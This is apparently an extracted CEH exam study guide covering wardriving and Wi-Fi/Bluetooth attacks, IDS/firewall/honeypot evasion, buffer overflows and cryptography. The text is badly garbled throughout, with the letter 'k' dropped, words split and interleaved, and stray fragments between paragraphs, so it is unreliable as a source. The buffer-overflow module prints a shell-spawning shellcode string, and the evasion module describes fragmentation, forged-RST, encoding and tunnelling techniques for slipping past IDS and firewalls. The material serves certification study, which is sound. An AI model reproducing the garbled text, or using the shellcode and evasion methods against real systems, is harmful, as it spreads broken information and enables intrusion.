Wardriving W ardriving refers to driving around with a m obile W i-Fi device loo ing for a W iFi signal. Cars driving around an area are common enough that they blend into the surroundings. Any meth od of travel can become a War vehicle. W arflying involves the use of a private, or in some cases a remote controlled, a ircraft with a W i-Fi antenna mounted to it for the purpose of finding Wi-Fi signal. Warwal ing can be in a small enough area, li e a college campus. Warchal ing is a method of documenting Wi-Fi networ s in public places. These ma r s often resemble ga r ffiti. Finding a Wi-Fi signal can be aided by using different antennas. Omnidirectional antennas are common; they pic up signal from all around them. A directional antenna such as a Yagi o nly wor s in one direction, but is designed to have a m uch greater range in that direction than a omnidirectional antenna would.


Wireless Hac ing Methodology W discovery can be passive by m i-Fi onitoring for traffic or active by sending pr out and getting responses. Using passive methods allows you to stay hidden for longer. Using act ive techniques will increase the chances of your attac s being discovered. However, active technique s will usually generate needed information faster. GPS Mapping is not always necessary for every job. Tools such as Netstumbler or WIGLE allow for automatic capturing of GPS data in the log. Wireless Traffic Analysis involves gathering of information such as SSIDs and en cryption methods to determine appropriate strategies for attac s. Som tools will automatically prov ide e this data while monitoring, such as aircrac -ng. Launch a wireless attac after determining the appropriate methods. Depending on the networ , you may have to crac Wi-Fi Encryption before this, or you may be able access inform ation without this step. Wireless Hac ing Tools Tool Recommendation: Aircrac -ng is the most used Wi-Fi tool of our practice. Yo uTube videos and Google searches will turn up an amazing amount of information on how to run it a what is needed to use aircrac -ng. Bluetooth Hac ing Bluetooth hac ing ta es advantage of some flaws in the Bluetooth stac in order compromise Bluetooth enabled devices. All Bluetooth hac ing requires a close proximity to t device in question because of its lim its. Terms of Bluetooth Hac ing Bluesmac ing is a DoS attac caused by random data pac ets being sent to the dev ice. Blue Snar ing is the theft of information from a Bluetooth device Bluejac ing refers to sending messages over Bluetooth to other Bluetooth devices . This is done to he obes


anonymously through the OBEX protocol.

Defending Against Bluetooth Hac ing If you eep Bluetooth disabled until you need it, you will minimize the window o f opportunity for a hac er to compromise your device. When not pairing, eeping your device in a non -discoverable mode is the best method for ensuring that the device does not broadcast information a bout itself. Lastly, encrypt data on the mobile device as a defense in depth measure should your devi compromised. Defending Against Wireless Attac s Always assume that your wireless signal will be available outside of your intend wor area. Wireless signals handle netw traffic just li e a hub; the traffic is broadcast for any or in range with the right equipment. Special antennas can pic up a signal and broadcast from much further standard wor space equipment. Hiding your SSID Broadcast and positioning your antennas ca only do so much to limit your ris . These hiding techniques remove you from the low-hanging frui t category that hac ers lo fo o r. By ensuring that your wireless networ is encrypted, and that your authenticatio implemented correctly, you can eep your traffic confidential. M e sure that your wireless a networ is only being used by the devices and users that need to use it. If a client can be wired, the afforded a greater level of security. As with any other networ , be sure that your equipment does not use default pass words. Physical access to networ equipment can be used to bypass many networ security controls . Periodic sweeps loo ing for rogue access points that may have been plugged into your wired netwo r will avoid this problem. WiFi Security Tools A ircrac -ng S uite: A in one set of tools easily found in B trac . O practi ll ac ur uses this tool as a beginning to end tool. It allow for sniffing of traffic, pac et capture, M s AC ad dress capture, SSID and encryption method capture. After getting the information you need Aircrac provi des tools for brea ing ce ed one than n

ce be

n is

y are

encryption eys and using the decrypted eys for replay attac s. Kismet Kismet is a layer 2 wireless sniffer that wor s with most common wireless networ cards. Kismet identifies networ s by passively collecting pac ets and detecting standard named networ s, detecting hidden networ s, and inferring the presence of non-beaconing networ s via data t raffic.

Netstumbler N etstum bler is a tool that sniffs W signals and inform users if their w i-Fi s irel networ is properly configured. This tool can be set to play an audio tone when it finds networ s, w hich is great for Wardriving. Wireless Pen Testing Framewor The penetration test of a wireless networ component begins with documenting wha t security is currently in place. After docum enting the current state, the next step is to dis cover what vulnerabilities are available to exploit. O nce a w ireless device is discovered an auditor w d ill etermine what security is being used, such as WEP or WPA encryption. If the wireless networ is using up-to-date encryption methods, and it is implem ented in a secure manner, the auditor can then determine if the target would require an infeasible amount of time to brute force an opening. Once this is determined and documented, the report can b e created with the findings. ess Module 16 Evading IDS, Firewalls and Honeypots Objectives: . Intrusion Detection Systems (IDS) . Ways to Detect an Intrusion . Types of Intrusion Detection Systems Firewalls . Types of Firewalls . Firewall Identification Techniques Honeypots . Types of Honeypots . Evading IDS . Evading Firewalls . Countermeasures . Firewall and IDS Penetration Testing

. .

Description: .jpg Description: Intrusion Detection Systems (IDS) An intrusion detection system analyzes data from a networ and compares that dat a against rules that have been configured. If the data does not match what the system expects it can raise an alarm. To analyze data an IDS has to be set to capture pac ets. To raise an alarm it has t configured with rules that trigger this response. Ways to Detect an Intrusion Signature Recognition Captured data is compared to signatures of possible attac s. This is also called misuse detection. Anomaly Detection This IDS relies on having a baseline of w hat norm netw traffic loo s li e, on ce al or this is determ ined anything outside of that norm is an anomaly. Protocol Anomaly Detection Instead of a baseline of networ traffic the expected behavior of protocols are as a base. Anything outside of this expected behavior is considered an anomaly. Types of IDS Networ Based A device placed on the networ in promiscuous mode to listen for traffic and to dynamically inspect networ pac ets for suspicious and anomalous activity Host Based A host-based IDS monitors all or parts of the dynamic behavior and the state of computer system Thin of HIDS as an agent that monitors whether anything or anyone, whether inte rnal or external, has circumvented the system's security policy. Log File Monitoring These systems collect log data and comb through it to hopefully reveal events af ter they occur a used

o be

Description: .jpg Description: Intrusion Detection Tool: Snort Snort is an open source netw or tool capable of firew type pac et filtering, all protocol analysis, and rules based logging. Snort is used for a variety of networ tas s. The CEH exam expects students to be familiar with Snort logs and functions, but not necessarily exact commands.

File Integrity chec ing Compares files against a record of what the file is supposed to loo li e to mon itor if files have been changed by intruders. Any of these ID systems may be wrapped into another piece of equipment such as a firewall or networ gateway. Indications of Intrusions 1. New files that are unfam iliar 2. Repeated probes of machines and services 3. Connections from unusual locations 4. Gaps in system log file accounting 5. System crashes or reboots Unfortunately, these indications can also be signs of user activity and accident s. Firewalls A firewall is a pac et filter between networ s. Commonly they are used to nternet traffic on one side of the w and internal traffic on the other side. F all irew alls m filter tr ay based on port, source or destination address, or type of traffic. Firewall Architecture Bastion Host A bastion host is a special purpose computer on a networ specifically designed configured to w ithstand attac s. It is configured to have a public interface connected to the Internet and a private one connected to the internal networ . A bastion host is a com puter that is fully exposed to attac . The system is on t he public side of the dem ilitarized zone (DM unprotected by a firewall or filtering router. Frequen tly Z), the roles of these system are critical to the networ security system s . and eep i affic

Description: .jpg Description: There are two common networ configurations that include bastion hosts and their placement. The first requires tw firew o alls, w bastion hosts sitting betw ith een the first "outside w rld" o firew and an inside all, firewall, in a demilitarized zone (DMZ). Often smaller networ s do not have mult iple firewalls, so if only one firewall exists in a networ , bastion hosts are commonly placed outside the firewall. Screened Subnet A screened subnet firewall can be used to separate components of the firewall on separate systems, for speed and organizational purposes. This requires at least three interfaces, public, private, and m ixed. As each component system of the screened subnet firewall needs to implement only a specific tas , each system is less complex to configure. A screened subnet firewall is often used to establish a demilitarized zone (DMZ) DMZ houses resources that are available to the public, such as web servers. This allows the private systems to be ept behind a separate networ interface to

. The

Multi-homed Firewall Multi-homed equipment allows for more zone creation to eep sections of the inte rnal networ from connecting or for allowing the DMZ to be more specifically divided up. Types of Firewalls Firewalls are categorized by what level of the OSI model at which they operate. Pac et Filtering Firewall These firew alls w at the netw level. Typically, they are paired w a net or or ith router to compare pac ets with criteria and then discard or route the pac et in question depending on the criteria it matches. These may allow for further rule customization such as addresses, ports , or protocols involved. Circuit Level Gateway Firewall This type of firewall operates at the Session Level of the OSI model. These gate ways monitor traffic for TCP handsha e information and determine whether or not the session is allowed. T hey do not filter individual pac ets. wor

Application Level Firewall There firewalls operate at the Application layer of the OSI model. Only allowed applications are able to pass traffic through this system The high level filtering allow for applicatio n . s specific filtering. Stateful M ultilayer Inspection Firewall T is a com his bination of firew types that filters at all of the above firew l all al types levels. Firewall Identification Techniques Firew alls can be identified by how they act. All Firew alls involve using a set o f rules, rules create patterns, and patterns can be exploited by Hac ers. Some firewalls have a signat ure of what ports they listen on, they are revealed by port scanning. Firewal ing is a method of using Time to Live of TCP or UDP pac ets to determine if a target allows traffic through to a hop on the other side. Which pac ets are forwarded and give TTL exceeded in transit message inform a hac er what pac ets are being passed onto the networ . Banner grabbing using FTP, Telnet, SMTP or http ports is another method of ident ifying services, if the banner has been left as a default. Honeypots Honeypots are systems that are configured to loo li e production systems to att ract possible intruders. Any activity on this otherwise unused system would be a sign of a hac er ta ing a loo around. However, as a hac er, when you encounter a system that appears to be open to eve rything you want to access, you are probably in a Honeypot and therefore will leave it alone. Types of Honeypots Honeypots can be classified based on their deployment and based on their level o involvement. Based on the deployment, honeypots may be classified as: Production honeypots are easy to use, capture only limited information, and are used primarily by companies or corporations; Production honeypots are placed inside the production networ with other production servers by an organization to improve their overall state of security f

Description: .jpg Description: n

Research honeypots are run by a volunteer, non-profit research organization or a educational institution to gather inform ation about the m otives and tactics of the crac er c ommunity targeting different networ s. Research honeypots are complex to deploy and maintain, capture extensi ve information, and are used primarily by research, military, or government organizations. Based on the design criteria, honeypots can be classified into three categories as 1. pure honeypots 2. high interaction honeypots 3. low interaction honeypots Pure honeypot is a full production system The activities of the attac er are m . o nitored using a casual tap installed on the honeypot s lin to the netw . or H igh interaction honeypots im itate the activities of the real system that host s wide variety of services and, therefore, an attac er m be allow a lot of services to w ay ed aste his/her ti me. If virtual machines are not available, each honeypot needs to be maintained for physical computer, which can be very expensive Low interaction honeypots are based on the services that the attac er normally r equests. There are many positives with the requirement of only few services by the attac ers which means low overhead and simple configuration. Example:Honeyd. Honeyto ens are honeypots that are not computer systems. Their value lies not in their use, but in their abuse. Honeyto ens can exist in almost any form, from a fa e account to a databa se entry that would only be selected by malicious queries, ma ing the concept ideally suited to ensu ring data integrity any use of them is inherently suspicious if not necessarily m alicious. In general, they don't necessarily prevent any tam pering with the data, but inst give the adm inistrator a further m easure of confidence in the data integrity.



Description: .jpg Description:

Evading Intrusion Detection Systems IDS s are susceptible to multiple evasion techniques and are even capable of being used to attac a target. By creating a Denial of Service a hac er can consume resources of the ID S to the point that it is unable to log an actual attac . DoS may also be used to bring the IDS offline, a llowing for the networ to be unprotected during the intended attac . Because an IDS uses specific rules to identify attac s any method used to encode or hide the attac may be successful, such as encoding in Unicode, or using encrypted channels. If the rules require an exact match of data, causing the dat a to loo different will not set off an alarm . Fragmentation attac s ta e advantage of a configuration in reassembly where the victim has a longer timeout for fragments than the IDS does. The IDS is unable to assemble the fragm ented attac in the window of time allow by its rule, and so passes on the pac ets, but the victim ed longer to reassemble and does so. Invalid RST pac ets may be used to tric IDS into believe a session has ended, b eep a communication alive. TCP uses chec sums to ensure communication is reliable, if this chec sum is wrong it will throw a pac et out. When an IDS sees the RST pac et with an invalid chec sum it does not discard it and assumes a session is over. The victim does see the chec sum as invalid and disca rds the RST pac et, eeping the communication going. Application layer attac s depend upon an IDS being unable to chec in a compress ed file format use as images or video pac ets. Any flood of data can be used to bury an attac w ithin a w of log data that o all goes unread or unanalyzed. Evading Firewalls By spoofing an IP address that is trusted by the target firew a hac er can g ain all, access just li e the actual spoofed machine By as ing for information in a method the firewall does not expect you can gain access to data the firew w all ould norm ally bloc . For exam ple, if a firew is configured to bloc all http access to ften



www.faceboo .com but you ping www.faceboo .com to find that it is hosted at 69.1 71.228.39 and put that number in your web browser, the firewall does not see that as as ing for th same information. Creating a tunnel through accepted protocols can also bypass most firewall restr ictions. ICMP, HTTP, and other standard communications can be used to create a tunnel that is then se en by the firewall as accepted communication.

Description: .jpg Description:

Countermeasures IDS s and Firewalls live and die by their rules and signatures. Always eep the si gnatures and software up to date to avoid being victim to an already patched exploit or a signature th was available. Ensure that your settings allow of the IDS to see fragmented data exactly as the end cl ient will see it. Rules need to be set to account for the ability of inform ation to be as ed for and sen t in m ultiple encoding methods.


Firewall/IDS Penetration Testing Testing of firew alls and Intrusion D etection System is a m s atter of finding if t rules involve account for the methods that may be used to bypass their protection. If the rules eep out t he attac , then the system is considered secure. he

Description: .jpg Description:

Module 1 7 Buffer Overflows

Study Guide Objectives: . Buffer Overflows . Stac -Based Buffer Overflow Heap-Based Buffer Overflow Stac Operation . Buffer Overflow Steps . Attac ing a Real Program . Smashing the Stac . Identifying Buffer Overflows BoF Detection Tools . Defense against Buffer Overflows BoF Countermeasure Tools . BoF Pen Testing . .

. . Buffer Overflows Programs utilize memory to wor . They store information in allocated memory. The se allocations are usually created to fit a certain number of bytes in data. W hen the inform ation t is placed in memory is more bytes than the space that was allocated you have a buffer overflow or bu ffer overrun. This overwrites whatever comes next in the memory. If a critical piece of data is ove rwritten the program crashes. This can be as simple as a program expecting to receive a 10 digit phon number but a command li e strcpy placing 11 bits in the memory space, crashing the program. Stac Based Buffer Overflow The stac or call stac is a section of m ory used to eep trac of subroutines em computer program. The Stac Based Buffer overflow attac s this structure to over w rite data or int roduce commands to ma e the program function in ways the programmer did not intend. HeapBased Buffer Overflow The heap is an area in memory dynamically created when the program is run. This data is corrupted by a Heap Based Overflow to alter the structure of the heap to run malicious code Stac Operation Shellcode Exploits for Buffer overflows utilize Shellcode. These bits of assembly level pr ogramming language are written to cause the buffer overflows and give a hac er a measure of control. Fo CEH test be able to identify shellcode such as this: /* This is the m inim shellcode from the tutorial */ al static char shellcode[]= "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d" "\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58" in a


r the No Operations Most CPU s have a No Operation instruction, or NOP. This instruction tells a proce ssor not to process the follow code until it gets to a certain Pointer in the program A long str ing . of these instructions can be placed into an exploit, which is called a NOP sled. The NOP sled is often encoded to loo li e something else, but recognizing 0x90 as a standard NOP is recommended. Knowledge Required to Create a Buffer Overflow Exploit To create a Buffer Overflow the hac er has to have an understanding of the under lying structures such as stac and heap memory processes, system calls at the machine code level, asse mbly level programing, and nowledge of debugging tools and how higher level programming la nguages convert into lower level languages. Knowledge Required to Run a Created Exploit If a piece of software has a nown Buffer Overflow issue there may already be an exploit tool available. Anyone who can find the tool and the vulnerable software in use can run the expl oit. Smashing the Stac In general, a Buffer Overflow allows a hac er to control where the program loo s for information in the stac and point it to code they want to run. This is nown as smashing the stac . After the stac is smashed the hac er has the same privileges as the process, and then gain super u ser access. It is also possible to create bac doors using inetd or Trivial FTP, or ma e connections usi netcat Identifying Buffer O verflow Vulnerabilities Identifying these vulnerabilities is generally done by code review and manual te Debugging software such as Ollydbg can be used to generate malformed input in programs and watch exactly how the Stac or Heap handles the problem sting.


ng Preventing Buffer Overflow Attac s The prevention of Buffer Overflow attac s comes from having programmers who are familiar with what can happen when the stac or heap is left open to these vulnerabilities. By usin safe languages or ma ing sure not to use unsafe functions in languages you can prevent many common overflows. By having a strong code review process after the code is written you can find possi ble crac s. Data Execution Prevention (DEP) DEP is a set of hardware and software technologies that wor to monitor programs and verify in real time if they are using system memory in a safe manner. Buffer Overflow Penetration Testing If the source code is available, review the code for insecure function calls. If the ing source code is not available reverse engineering is possible using disassemblers and debugging tool s. The process for using the debugger involves sending the code large amounts of input data and watching the code handles it. Understanding the programing involved is required. As always, documentation of all the findings is critical to a good penetration test

how Module 18 Cryptography Study Guide Objectives: . Introduction and Definitions . Types of Cryptography . Ciphers . Algorithms . Message Hashes / Digest . Public Key Infrastructure (PKI) Dis Encryption . Cryptography Attac s Introduction and Definitions Cryptography is used to ma e data unreadable, literally meaning hidden writing . Th is is usually done by a mathematical algorithm which ta es information and turns it in to what is called cipher text, a process called encoding. For example: you can rotate the a lphabet by thirteen characters so that computer becomes pbzchgre, each letter is substitute d with the letter that is 13 places in front of it. This is a very basic m ethod now as R n O The plaintext is com puter, the cipher text is pbzchgre, and the algorithm is rotating letters 13 places down the alphabet.


Cryptography is used to eep data confidential. In order to create a confidentia method, the algorithm used requires a crypto-variable or ey. The use of a ey results in a unique algorithm; this allows multiple users to use a common algorithm while maintaining confident iality. Instead of using ROT13 as above it becomes ROTx where x can represent any number of rotations. When someone is authenticated to use the encrypted data they are give eys necessary to decrypt it and view the data. Cryptography is also used to provide data integrity and non-repudiation. Integrity is the ability to be sure that the data has not b altered. Nonrepudiation is the ability to be sure that the data cam from a certain source b e attaching a digital fingerprint to a m essage. Types of Cryptography Asymmetric Asymmetric encryption uses one ey to encrypt and different ey to decrypt. Thes e are the public and private eys. If som ething is encrypted with the private ey, it can only be dec rypted with the public ey. If something is encrypted with the public ey it can only be decrypted by t private ey. The private ey is what the entity eeps private. W hen the private ey is used to en crypt a message it is effectively enclosed in a digital envelope . This provides non-repudiation; the ent ities involved now that only the holder of the private ey could have wrapped it with encryption th opened with a specific public ey. Li ewise, a message encrypted with an entities public ey c only be read by the entity w the private ey, assuring the parties of confidentiality. It is im ith po to remember is that the

n the

een y


at is an rtant

eys in such a structure cannot be derived from each other. Asymmetric encryption is used when the ey needs to be transmitted securely wher e it would be infeasible to do so out of band, such as in email encryption. Symmetric Symmetric encryption uses the same ey for encryption and decryption. The entiti es using this ey have to ta e great care in protecting this ey; anyone with access to this ey can re any message that is encrypted w it. This ey is usually ept at a secure location and is transfer ith out of band. Symmetric encryption is faster than using asymmetric. IPSEC is a good example w hich is used for VPN type traffic w hich requires a high rate of transm ission. Hash Function A hash function is a one way method encryption. It does not require a ey. It is to create a piece of cipher text which does not need to be decrypted. This is used to provide inte grity for a file, such as a chec sum. A piece of plaintext passed through an algorithm gives a message diges t hash, which can be used to prove that the plaintext is w hole, proving integrity. Ciphers Bloc Ciphers Bloc Ciphers encrypt bloc s of data. Some ciphers can only use bloc s of certai n sizes, others are able to use variable bloc sizes. This cipher is slow, and is com only used for large r m sets of data. The ciphers w by brea ing the data into bloc s of w or hatever size such as 160 bit bloc s, t encrypting each piece. used

ad red


Stream Ciphers Stream ciphers encrypt continuous streams of data. These are often used in symme tric encryption for data that has to be transmitted quic er. This type of cipher does not require ce rtain data size bloc s. Algorithms DES This bloc cipher was chosen in 1976 by the US NSA to be the U.S. Data Encryptio Standard. DES uses a ey of 56 bits, thought at the time to be beyond the ability of any c omputer to brute force attac and determine the ey. n

As computer power has increased in the last three decades the 56 bit ey is no l onger considered secure. Triple DES was created by ta ing the DES cipher algorithm and applying i t three times to each data bloc , with a different ey each tim This gives an effective ey len gth e. of 168.

RC Algorithms The RC algorithms are a set of symmetric- ey encryption algorithms invented by R on Rivest. RC4 is a widely used variable bit stream cipher. RC5 is a 32/64/128-bit bloc ci developed in 1994. RC6 is a 128-bit bloc cipher based heavily on RC5 created in 1997. pher

RSA R SA is a public- ey cipher used for both confidentiality and digital signatures, based on the difficulty of factoring large num bers.

AES AES is a symmetric- ey bloc cipher. It uses 128 bit bloc s and has a variable ey size of 128, 192 or 256 bits. AES is currently considered the standard for secure encryption.

Message Hashes / Digests Message Digests or Messages Hashes are one way encryption of a bloc of data. Th is cipher text is called a H ash Value. If any bit in the original text changes every bit has a fif percent chance of also


changing, ma ing it infeasible for two documents to have the same hash value. Th ese values are used for verifying file or m essage integrity. They are also used as an identifier for files or persons w here it is a bad idea to transmit a password.

Message Digest Ciphers

M D5 MD stands for Message Digest. MD5 has is a 32 digit hexadecimal number that can used as a digital fingerprint or signature. It w show to be w as n ea to C ollision Attac s i 2008. be n SHA The Secure Hashing Algorithm was created by the NSA as part of a U.S. Federal In formation Processing standard. SHA-1 produces a 160 bit digest from a message. It is very similar to MD5. SHA-2 has two different functions, SHA-256 which can produce an output of e ither 256 or 224 bit, and SHA-512 which can produce an output of either 512 or 384 bit. Th NIST has stated that the Federal government is required to use SHA-2 functions after 2010

Examples of Message Digest Uses

SSL and TLS communication between clients and servers use Hash functions during the handsha e stage to start communication. The client as s the server for a secure connection and presents the list of has functions it can use. The server chooses the strongest one available that both can use and tells the client. The server then presents its digital certific which has been generated using a hash function, to the client. The client can then chec the ce rtificate with the Trust authority. Once this is done the client encrypts a random number with the server s Public ey so that only the server can decrypt it. From that random number both server and client generate session eys to be used for the symmetric encryption.


SSH (Secure Shell) uses Public and Private Keys to authenticate uses and generat secure tunnel. You generate a ey pair using a tool li e PuTTY. The Public ey is store the SSH server that needs to be available for connection. Using a hash function you crea te a signature from your private ey, which only you could generate. When using SSH to log on t o the server you present this digital signature to the server w can verify it w the publ ho ith ey. The private ey is never transmitted.

ea d on


Public Key Infrastructure (PKI)

PKI refers to all the bac ground parts needed to use digital certificates as a w

ay of equating public eys to entities using them .


Registration Authority This entity handles the requests of an entity (server, com puter, or person) to o btain a digital ce rtifica te

C ertification Authority This entity generates and assigns certificate to entities. Also referred to as a Trusted Third Party (TTP) Validation Authority This entity handles the requests for confirmation that an entity is who they say are when they present a digital certificate. they

In some systems these entities may all be one server. The term PKI is sometimes used incorre ctly to refer to the C ertificate A uthority (C ). T termdigital certifi A he refers to the X.509 standard document used in PKI.


Examples of commercial Certification Authorities include VeriSign, Go Daddy, and Comodo.

PKI can also exist in a Web of Trust model, as implemented in the Pretty Good Pr ivacy free version of em encryption. A w of trust exists as a set of certificates that ail eb user trusts and can be used with the commercial models as long as another Certificate Authority will bac the self-signed certificates as authentic.

Uses of PKI

PKI is used in both encrypted email and encrypted web traffic. In email encrypti message can be run through a hash function which creates a hash value unique to the mess age. This function is added as a signature to the message. The message itself is encrypted with the recipients public ey, so that it can only be decrypted by that recipient using their private ey, ensuring Confidentiality. When the message is decrypted, the hash value can be d ecrypted using the senders Public ey, ensuring the Integrity of the email message.

on, a

In web traffic such as SSL and TLS, websites are issued certificates from Certif ication Authorities to use to handsha e and identify themselves to clients.

Dis Encryption Dis encryption refers to encrypting the data on a hard drive or other media. Wh en the data in storage is encrypted it assures confidentiality of the data. O best practice i s to ne encrypt all data bac ups when they are put onto removable media such as DVD or tape.

Our practice uses the free tool TrueCrypt for dis encryption. TrueCrypt also ha s the ability to create a hidden volume within an encrypted volume for plausible deniability. Thi hidden volume cannot be detected unless supplied with the hidden volume passphrase. Cryptography Attac s All cryptographic attac s assume that the person doing the attac has access to encrypted information.

Brute Force attac s attempt to try every possible ey for the cryptographic func Success depends on how long the ey is, how much time the hac er has, and what other sec urity mechanisms are in place such as account loc out. The time and security mechanis can be bypassed by techniques such as using Rainbow tables against a stolen hash.



Known Plaintext attac s are those attac s where a hac er has the whole of plaint ext that has been encrypted and the associated cipher text. When an attac er has the whole en crypted m essaged it is possible to figure out the algorithm used to encrypt the plaintex t .

Chosen Plaintext attac s occur when a hac er can chose a piece of plaintext and access to the encryption function. Using the hac er s plaintext he can then ta e the generat ed cipher text and com pare it to the plaintext to figure out a ey.


Chosen Ciphertext attac s occur when a hac er has the ability to ta e a piece of Ciphertext and decrypt it, then analyze the output. This is sim to the newspaper style puzz ilar where you have a method of how the message is setup and the encrypted message.


W hile attac s against the ciphers them selves occur often it is quic er to attac the implementation or the person who uses the encryption instead. These methods are called Side Channel attac s.

Social Engineering attac s such as phishing or shoulder surfing can give an atta c er the passwords or eys used in encryption by ta ing advantage of users in question.

Rubber Hose attackers refer to using physical violence against someone who has kno wledge of the encryption keys to force them to reveal those keys